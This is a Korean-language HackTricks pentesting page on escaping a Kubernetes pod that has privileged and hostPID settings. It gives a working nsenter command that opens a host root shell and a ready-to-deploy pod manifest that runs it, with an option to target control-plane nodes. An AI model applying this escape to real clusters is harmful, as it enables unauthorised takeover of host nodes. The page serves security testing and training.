Pod Escape Privileges

Reading time: 2 minutes

tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

Privileged and hostPID

이 권한을 사용하면 호스트 프로세스에 접근할 수 있으며 호스트 프로세스의 네임스페이스에 들어갈 수 있는 충분한 권한을 갖게 됩니다.
특권이 필요하지 않을 수도 있으며, 단지 몇 가지 기능과 다른 잠재적인 방어 우회(예: apparmor 및/또는 seccomp)가 필요할 수 있습니다.

다음과 같은 것을 실행하는 것만으로도 포드에서 탈출할 수 있습니다:

bash
nsenter --target 1 --mount --uts --ipc --net --pid -- bash

구성 예:

yaml
apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid-exec-pod
labels:
app: pentest
spec:
hostPID: true
containers:
- name: priv-and-hostpid-pod
image: ubuntu
tty: true
securityContext:
privileged: true
command:
[
"nsenter",
"--target",
"1",
"--mount",
"--uts",
"--ipc",
"--net",
"--pid",
"--",
"bash",
]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name

tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기